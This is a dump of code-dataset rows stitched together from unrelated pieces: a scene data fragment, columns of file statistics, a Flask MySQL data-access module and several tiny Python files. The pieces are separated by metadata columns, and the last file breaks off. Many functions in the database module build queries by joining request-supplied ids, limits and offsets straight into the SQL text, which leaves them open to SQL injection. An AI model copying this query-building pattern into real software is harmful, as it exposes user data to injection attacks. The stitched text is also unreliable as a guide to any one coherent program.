'["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185473733.65kmuller"]','1185473757.92kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185473757.92kmuller"]','1185473855.14kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185473855.14kmuller"]','1185473892.76kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185473892.76kmuller"]','1185474062.46kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185474062.46kmuller"]','1185474078.9kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185474078.9kmuller"]','1185474160.92kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185474160.92kmuller"]','1257882161.54caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882161.54caoconno"]','1257882301.33caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882301.33caoconno"]','1257882430.02caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882430.02caoconno"]','1257882492.33caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882492.33caoconno"]','1257882618.84caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882618.84caoconno"]','1257882758.42caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882758.42caoconno"]','1257882773.01caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882773.01caoconno"]','1257882905.81caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257882905.81caoconno"]','1257883001.32caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257883001.32caoconno"]','1257883095.16caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257883095.16caoconno"]','1257883215.54caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257883215.54caoconno"]','1257883292.66caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1257883292.66caoconno"]','1276275771.91caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276275771.91caoconno"]','1276275849.16caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276275849.16caoconno"]','1276275913.72caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276275913.72caoconno"]','1276276656.64caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276276656.64caoconno"]','1276276761.84caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276276761.84caoconno"]','1276276898.97caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276276898.97caoconno"]','1276277085.36caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276275913.72caoconno"]["Objects"]["1276277085.36caoconno"]','1276277250.06caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276277250.06caoconno"]','1276278278.09caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276278278.09caoconno"]','1276279077.38caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276279077.38caoconno"]','1276279087.64caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276279087.64caoconno"]','1276279113.08caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276279113.08caoconno"]','1276279130.95caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276279130.95caoconno"]','1276280787.84caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276280787.84caoconno"]','1276280881.31caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276280881.31caoconno"]','1276280903.86caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276280903.86caoconno"]','1276281003.14caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281003.14caoconno"]','1276281034.33caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281034.33caoconno"]','1276281060.67caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281060.67caoconno"]','1276281452.61caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281452.61caoconno"]','1276281527.78caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281527.78caoconno"]','1276281535.05caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281535.05caoconno"]','1276281562.19caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281562.19caoconno"]','1276281609.44caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276281609.44caoconno"]','1276282879.52caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276282879.52caoconno"]','1276282964.03caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276282964.03caoconno"]','1276290221.34caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290221.34caoconno"]','1276290315.28caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290315.28caoconno"]','1276290526.81caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290526.81caoconno"]','1276290564.5caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290564.5caoconno"]','1276290607.91caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276290607.91caoconno"]','1276291879.27caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276291879.27caoconno"]','1276291898.09caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276291898.09caoconno"]','1276291923.52caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276291923.52caoconno"]','1276530477.89caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276530477.89caoconno"]','1276531019.5caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276531019.5caoconno"]','1276531170.86caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276531170.86caoconno"]','1276531673.56caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276531673.56caoconno"]','1276551367.75caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551367.75caoconno"]','1276551376.2caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551376.2caoconno"]','1276551501.94caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551501.94caoconno"]','1276551670.0caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551670.0caoconno"]','1276551731.52caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551731.52caoconno"]','1276551807.03caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276551807.03caoconno"]','1276710561.61caoconno': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1276710561.61caoconno"]'}}
extraInfo = {'camPos': Point3(-1.02564, -2.3457, 20.516),'camHpr': VBase3(20.7195, -16.0984, 0),'focalLength': 1.02199995518,'skyState': -2,'fog': 0}
| 16,504.333333
| 49,304
| 0.679438
| 6,696
| 49,513
| 4.956093
| 0.137843
| 0.021696
| 0.020882
| 0.017116
| 0.587899
| 0.485747
| 0.467968
| 0.409751
| 0.33038
| 0.293527
| 0
| 0.267633
| 0.048169
| 49,513
| 3
| 49,305
| 16,504.333333
| 0.436535
| 0
| 0
| 0
| 0
| 0
| 0.560104
| 0.311124
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
e0e16d42e3500128ea2775fb38369a6c687fcf51
| 16,116
|
py
|
Python
|
flask-backend/database.py
|
gvdijk/Project-Web-Mobile
|
5433a7329b93e7ddfe29fa20642ba97a932bf9ee
|
[
"MIT"
] | null | null | null |
flask-backend/database.py
|
gvdijk/Project-Web-Mobile
|
5433a7329b93e7ddfe29fa20642ba97a932bf9ee
|
[
"MIT"
] | 4
|
2021-03-09T04:56:38.000Z
|
2022-02-17T23:47:04.000Z
|
flask-backend/database.py
|
gvdijk/Project-Web-Mobile
|
5433a7329b93e7ddfe29fa20642ba97a932bf9ee
|
[
"MIT"
] | null | null | null |
import mysql.connector
from mysql.connector.pooling import MySQLConnectionPool
connectionPool = None
def init(user, password, host, database):
global connectionPool
dbconfig = {
"host": host,
"user": user,
"password": password,
"database": database
}
connectionPool = MySQLConnectionPool(pool_name='connection_pool',
pool_size=10,
pool_reset_session=True,
**dbconfig)
def getConnection():
return connectionPool.get_connection()
# -----------------------------------------Login Related Functions--------------------------------------- #
def getUserByName(name):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM user WHERE userDeleted = 0 AND userName = %s"
data = (name,)
cur.execute(sql, data)
results = cur.fetchone()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
# -----------------------------------------User Related Functions---------------------------------------- #
def getUserByID(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT userCreated, userID, userName, userPicture FROM user WHERE userDeleted = 0 AND userID = " + id
cur.execute(sql)
results = cur.fetchone()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getUserInfo(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT userCreated, userID, userName, userPicture FROM user WHERE userDeleted = 0 AND userID = " + id
cur.execute(sql)
results = cur.fetchone()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def addUser(name, password):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "INSERT INTO user(userName, userPass) VALUES(%s, %s)"
data = (name, password)
cur.execute(sql, data)
connection.commit()
lastID = cur.lastrowid
cur.close()
connection.close()
return getUserByID(str(lastID))
def getUserProjects(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM projectuser WHERE projectuserDeleted = 0 AND User_userID = " + id
cur.execute(sql)
results = cur.fetchall()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getUserPosts(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM post WHERE postDeleted = 0 AND postUser = " + id
cur.execute(sql)
results = cur.fetchall()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getUserComments(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM comment WHERE commentDeleted = 0 AND NOT commentState = 'DELETED' AND commentUser = " + id
cur.execute(sql)
results = cur.fetchall()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getUser(name, limit, offset):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT userID, userName, userPicture, userCreated FROM user "\
"WHERE userDeleted = 0"
data = ()
if (name is not None):
sql += " AND userName LIKE %s"
data = data + ("%" + name + "%",)
if limit is not None:
sql += " ORDER BY userName LIMIT " + limit
if offset is not None:
sql += " OFFSET " + offset
else:
sql += " ORDER BY userName"
cur.execute(sql, data)
results = cur.fetchall()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def updateUser(id, name, password):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "UPDATE user SET userName = %s, userPass = %s WHERE userID = " + id
data = (name, password)
cur.execute(sql, data)
connection.commit()
user = getUserByID(id)
cur.close()
connection.close()
return user
def deleteUser(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
try:
sql = "UPDATE user SET userDeleted = true WHERE userID = " + id
cur.execute(sql)
connection.commit()
cur.close()
connection.close()
return True
except Exception as e:
cur.close()
connection.close()
print(e)
return False
# ---------------------------------------Project Related Functions--------------------------------------- #
def addProject(name, description, visibility, owner):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "INSERT INTO project(projectName, projectDescription, projectVisibility, projectOwner) VALUES(%s, %s, %s, %s)"
data = (name, description, visibility, owner)
cur.execute(sql, data)
connection.commit()
lastID = cur.lastrowid
cur.close()
connection.close()
return getProjectByID(str(lastID))
def addProjectPost(title, content, owner, projectID):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "INSERT INTO post(postTitle, postContent, postUser, postProject) VALUES(%s, %s, %s, %s)"
data = (title, content, owner, projectID)
cur.execute(sql, data)
connection.commit()
lastID = cur.lastrowid
cur.close()
connection.close()
return getPostByID(str(lastID))
def addProjectUser(userID, projectID, role):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "INSERT INTO projectuser(User_userID, Project_projectID, projectuserRole) VALUES(%s, %s, %s)"
data = (userID, projectID, role)
cur.execute(sql, data)
connection.commit()
lastID = cur.lastrowid
cur.close()
connection.close()
return getProjectUserByID(str(lastID), str(projectID))
def getProjectsCount(name):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT count(*) as count FROM project "\
"WHERE projectDeleted = 0 AND (projectVisibility = 'PUBLIC' OR projectVisibility = 'RESTRICTED')"
data = ()
if (name is not None):
sql += " AND projectName LIKE %s"
data = data + ("%" + name + "%",)
sql += " ORDER BY projectName"
cur.execute(sql, data)
results = cur.fetchone()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getProjects(name, limit, offset):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM project "\
"WHERE projectDeleted = 0 AND (projectVisibility = 'PUBLIC' OR projectVisibility = 'RESTRICTED')"
data = ()
if (name is not None):
sql += " AND projectName LIKE %s"
data = data + ("%" + name + "%",)
if limit is not None:
sql += " ORDER BY projectCreated DESC LIMIT " + limit
if offset is not None:
sql += " OFFSET " + offset
else:
sql += " ORDER BY projectCreated DESC"
cur.execute(sql, data)
results = cur.fetchall()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getProjectByID(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM project WHERE projectDeleted = 0 AND projectID = " + id
cur.execute(sql)
results = cur.fetchone()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getProjectUsers(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM projectuser WHERE projectuserDeleted = 0 AND Project_projectID = " + id
cur.execute(sql)
results = cur.fetchall()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getProjectUserByID(userID, projectID):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM projectuser WHERE projectuserDeleted = 0 AND Project_projectID = %s AND User_userID = %s"
data = (projectID, userID)
cur.execute(sql,data)
results = cur.fetchone()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getProjectPostsCount(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT count(*) as count FROM post WHERE postDeleted = 0 AND postProject = " + id
cur.execute(sql)
results = cur.fetchone()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def getProjectPosts(id, limit, offset):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM post WHERE postDeleted = 0 AND postProject = " + id
if limit is not None:
sql += " ORDER BY postCreated LIMIT " + limit
if offset is not None:
sql += " OFFSET " + offset
else:
sql += " ORDER BY postCreated"
cur.execute(sql)
results = cur.fetchall()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def updateProject(id, title, content, visibility):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "UPDATE project SET projectName = %s, projectDescription = %s, projectVisibility = %s WHERE projectID = " + id
data = (title, content, visibility)
cur.execute(sql, data)
connection.commit()
project = getProjectByID(id)
cur.close()
connection.close()
return project
def updateProjectUser(projectID, userID, role):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "UPDATE projectuser SET projectuserRole = %s WHERE User_userID = %s AND Project_projectID = %s"
data = (role,userID,projectID,)
cur.execute(sql, data)
connection.commit()
sql = "SELECT * FROM projectuser WHERE projectuserDeleted = 0 AND Project_projectID = %s AND User_userID = %s"
data = (projectID,userID,)
cur.execute(sql, data)
result = cur.fetchone()
cur.close()
connection.close()
return result
def deleteProject(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
try:
sql = "UPDATE project SET projectDeleted = true WHERE projectID = " + id
cur.execute(sql)
connection.commit()
cur.close()
connection.close()
return True
except Exception as e:
cur.close()
connection.close()
print(e)
return False
def deleteProjectUser(projectID, userID):
connection = getConnection()
cur = connection.cursor(dictionary=True)
try:
sql = "DELETE FROM projectuser WHERE Project_projectID = %s AND User_userID = %s"
data = (projectID,userID)
cur.execute(sql,data)
connection.commit()
cur.close()
connection.close()
return True
except Exception as e:
cur.close()
connection.close()
print(e)
return False
# -----------------------------------------Post Related Functions---------------------------------------- #
def addPostComment(content, parentID, userID, id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "INSERT INTO comment(commentContent, commentUser, commentParent, commentPost) VALUES(%s, %s, %s, %s)"
data = (content,userID,parentID,id)
cur.execute(sql, data)
connection.commit()
lastID = cur.lastrowid
cur.close()
connection.close()
return getCommentByID(str(lastID))
def getPostByID(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM post WHERE postDeleted = 0 AND postID = " + id
cur.execute(sql)
results = cur.fetchone()
cur.close()
connection.close()
if results is not None:
project = getProjectByID(str(results['postProject']))
if project is None:
results = None
if (results is not None and len(results) == 0):
return None
else:
return results
def getPostComments(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM comment WHERE commentDeleted = 0 AND commentPost = " + id
cur.execute(sql)
results = cur.fetchall()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def updatePost(id, content):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "UPDATE post SET postContent = %s WHERE postID = " + id
data = (content,)
cur.execute(sql, data)
connection.commit()
result = getPostByID(id)
cur.close()
connection.close()
return result
def deletePost(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
try:
sql = "UPDATE post SET postDeleted = true WHERE postID = " + id
cur.execute(sql)
connection.commit()
cur.close()
connection.close()
return True
except Exception as e:
cur.close()
connection.close()
print(e)
return False
def deltePostComments(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
try:
sql = "UPDATE comment SET commentDeleted = true WHERE commentPost = " + id
cur.execute(sql)
connection.commit()
cur.close()
connection.close()
return True
except Exception as e:
cur.close()
connection.close()
print(e)
return False
# ---------------------------------------Comment Related Functions--------------------------------------- #
def getCommentByID(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "SELECT * FROM comment WHERE commentDeleted = 0 AND commentID = " + id
cur.execute(sql)
results = cur.fetchone()
cur.close()
connection.close()
if (results is not None and len(results) == 0):
return None
else:
return results
def updateComment(id, content):
connection = getConnection()
cur = connection.cursor(dictionary=True)
sql = "UPDATE comment SET commentContent = %s, commentEdited = current_timestamp() WHERE commentID = " + id
data = (content,)
cur.execute(sql, data)
connection.commit()
cur.execute("SELECT * FROM comment WHERE commentDeleted = 0 AND commentID = " + id)
result = cur.fetchone()
cur.close()
connection.close()
return result
def deleteComment(id):
connection = getConnection()
cur = connection.cursor(dictionary=True)
try:
sql = "UPDATE comment SET commentContent = 'Deze reactie is verwijderd', commentState = 'DELETED' WHERE commentID = " + id
cur.execute(sql)
connection.commit()
cur.close()
connection.close()
return True
except Exception as e:
cur.close()
connection.close()
print(e)
return False
| 30.580645
| 130
| 0.618764
| 1,740
| 16,116
| 5.720115
| 0.091379
| 0.031347
| 0.070532
| 0.090124
| 0.767306
| 0.751532
| 0.735155
| 0.724405
| 0.714458
| 0.669949
| 0
| 0.003155
| 0.252668
| 16,116
| 526
| 131
| 30.638783
| 0.823231
| 0.032452
| 0
| 0.759657
| 0
| 0.006438
| 0.198511
| 0.003016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075107
| false
| 0.017167
| 0.004292
| 0.002146
| 0.201717
| 0.012876
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1ca114af0fa1c21bf0564af2fcf7a1467936ae19
| 47
|
py
|
Python
|
oommffield/__init__.py
|
joommf-attic/oommffield
|
95a6e1c2d795f884748d33c90134c18d8aeb73a2
|
[
"BSD-2-Clause"
] | 1
|
2016-08-08T14:47:38.000Z
|
2016-08-08T14:47:38.000Z
|
oommffield/__init__.py
|
joommf/oommffield
|
95a6e1c2d795f884748d33c90134c18d8aeb73a2
|
[
"BSD-2-Clause"
] | 1
|
2018-04-26T15:42:54.000Z
|
2018-04-30T18:07:31.000Z
|
oommffield/__init__.py
|
joommf-attic/oommffield
|
95a6e1c2d795f884748d33c90134c18d8aeb73a2
|
[
"BSD-2-Clause"
] | null | null | null |
from .oommffield import Field, read_oommf_file
| 23.5
| 46
| 0.851064
| 7
| 47
| 5.428571
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 47
| 1
| 47
| 47
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1ca8a6ff43bad4a06a7c5ee86fcc747edab73f32
| 195
|
py
|
Python
|
test/python/topology/test_common_namespace/package1/common_namespace/module1.py
|
Jaimie-Jin1/streamsx.topology
|
6f316ec8e9ed1349c6f061d9bb7d03deb87e3d08
|
[
"Apache-2.0"
] | 31
|
2015-06-24T06:21:14.000Z
|
2020-08-28T21:45:50.000Z
|
test/python/topology/test_common_namespace/package1/common_namespace/module1.py
|
Jaimie-Jin1/streamsx.topology
|
6f316ec8e9ed1349c6f061d9bb7d03deb87e3d08
|
[
"Apache-2.0"
] | 1,203
|
2015-06-15T02:11:49.000Z
|
2021-03-22T09:47:54.000Z
|
test/python/topology/test_common_namespace/package1/common_namespace/module1.py
|
Jaimie-Jin1/streamsx.topology
|
6f316ec8e9ed1349c6f061d9bb7d03deb87e3d08
|
[
"Apache-2.0"
] | 53
|
2015-05-28T21:14:16.000Z
|
2021-12-23T12:58:59.000Z
|
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2016
class SourceTuples:
def __init__(self, tuples=[]):
self.tuples = tuples
def __call__(self):
return self.tuples
| 24.375
| 38
| 0.692308
| 24
| 195
| 5.291667
| 0.666667
| 0.23622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026144
| 0.215385
| 195
| 7
| 39
| 27.857143
| 0.803922
| 0.312821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
1c2a09853855265f7dee755f163a430ff190c8dc
| 116
|
py
|
Python
|
src/app/forms/__init__.py
|
schwetzen/liblr
|
408235a4f539a05f54f0376dbf9dbcd83957db03
|
[
"Apache-2.0"
] | null | null | null |
src/app/forms/__init__.py
|
schwetzen/liblr
|
408235a4f539a05f54f0376dbf9dbcd83957db03
|
[
"Apache-2.0"
] | 1
|
2018-12-07T22:15:28.000Z
|
2018-12-07T22:15:28.000Z
|
src/app/forms/__init__.py
|
schwetzen/liblr
|
408235a4f539a05f54f0376dbf9dbcd83957db03
|
[
"Apache-2.0"
] | 2
|
2018-12-07T20:59:53.000Z
|
2018-12-17T21:02:21.000Z
|
from app.forms.auth import RegisterForm
from app.forms.readingtip import ReadingTipCreateForm, ReadingTipUpdateForm
| 38.666667
| 75
| 0.87931
| 13
| 116
| 7.846154
| 0.692308
| 0.137255
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077586
| 116
| 2
| 76
| 58
| 0.953271
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1c4c682149faba9396186e89a135bf56202c82c5
| 689
|
py
|
Python
|
test/test_element_type.py
|
gleb-svechnikov/GcodeParser
|
36a36ef935b3570f8ca7cece70a4eb0900f8c8c1
|
[
"MIT"
] | 2
|
2021-12-04T01:24:42.000Z
|
2022-03-11T09:29:24.000Z
|
test/test_element_type.py
|
gleb-svechnikov/GcodeParser
|
36a36ef935b3570f8ca7cece70a4eb0900f8c8c1
|
[
"MIT"
] | 3
|
2021-02-12T23:56:07.000Z
|
2021-06-24T09:45:40.000Z
|
test/test_element_type.py
|
gleb-svechnikov/GcodeParser
|
36a36ef935b3570f8ca7cece70a4eb0900f8c8c1
|
[
"MIT"
] | 3
|
2021-06-16T21:26:43.000Z
|
2021-12-04T01:37:04.000Z
|
from gcodeparser.gcode_parser import (
element_type,
)
def test_element_type_int():
assert element_type('109321') == int
def test_element_type_neg_int():
assert element_type('-109321') == int
def test_element_type_float():
assert element_type('109321.0') == float
def test_element_type_float2():
assert element_type('109321.012345') == float
def test_element_type_neg_float():
assert element_type('-1.0') == float
def test_element_type_neg_float2():
assert element_type('-1.013456') == float
def test_element_type_str():
assert element_type('192.168.0.1') == str
def test_element_type_str2():
assert element_type('"test string"') == str
| 19.138889
| 49
| 0.716981
| 98
| 689
| 4.663265
| 0.244898
| 0.40919
| 0.245077
| 0.315098
| 0.431072
| 0.374179
| 0.205689
| 0.205689
| 0.205689
| 0.205689
| 0
| 0.087629
| 0.155298
| 689
| 35
| 50
| 19.685714
| 0.697595
| 0
| 0
| 0
| 0
| 0
| 0.103048
| 0
| 0
| 0
| 0
| 0
| 0.421053
| 1
| 0.421053
| true
| 0
| 0.052632
| 0
| 0.473684
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
98c48d842cc8b861f9856bec283fac932d83023f
| 95
|
py
|
Python
|
rvpvp/isa/__init__.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 5
|
2021-05-10T09:57:00.000Z
|
2021-10-05T14:39:20.000Z
|
rvpvp/isa/__init__.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | null | null | null |
rvpvp/isa/__init__.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 1
|
2021-05-14T20:24:11.000Z
|
2021-05-14T20:24:11.000Z
|
from .rvi import *
from .rvm import *
from .rvf import *
from .rvc import *
from .rvv import *
| 15.833333
| 18
| 0.684211
| 15
| 95
| 4.333333
| 0.466667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 95
| 5
| 19
| 19
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
98d553e01c3261bad7f65953eecd7fd6a37e16ba
| 191
|
py
|
Python
|
nexoclom/modelcode/__init__.py
|
mburger-stsci/NExoCloM
|
c0c81eeb04c5571662f3d86337d84a18f1cd0dcf
|
[
"BSD-3-Clause"
] | null | null | null |
nexoclom/modelcode/__init__.py
|
mburger-stsci/NExoCloM
|
c0c81eeb04c5571662f3d86337d84a18f1cd0dcf
|
[
"BSD-3-Clause"
] | null | null | null |
nexoclom/modelcode/__init__.py
|
mburger-stsci/NExoCloM
|
c0c81eeb04c5571662f3d86337d84a18f1cd0dcf
|
[
"BSD-3-Clause"
] | 1
|
2018-11-23T20:55:33.000Z
|
2018-11-23T20:55:33.000Z
|
from nexoclom.modelcode.Input import Input
from nexoclom.modelcode.Output import Output
from nexoclom.modelcode.LOSResult import LOSResult
from nexoclom.modelcode.ModelImage import ModelImage
| 47.75
| 52
| 0.879581
| 24
| 191
| 7
| 0.333333
| 0.285714
| 0.5
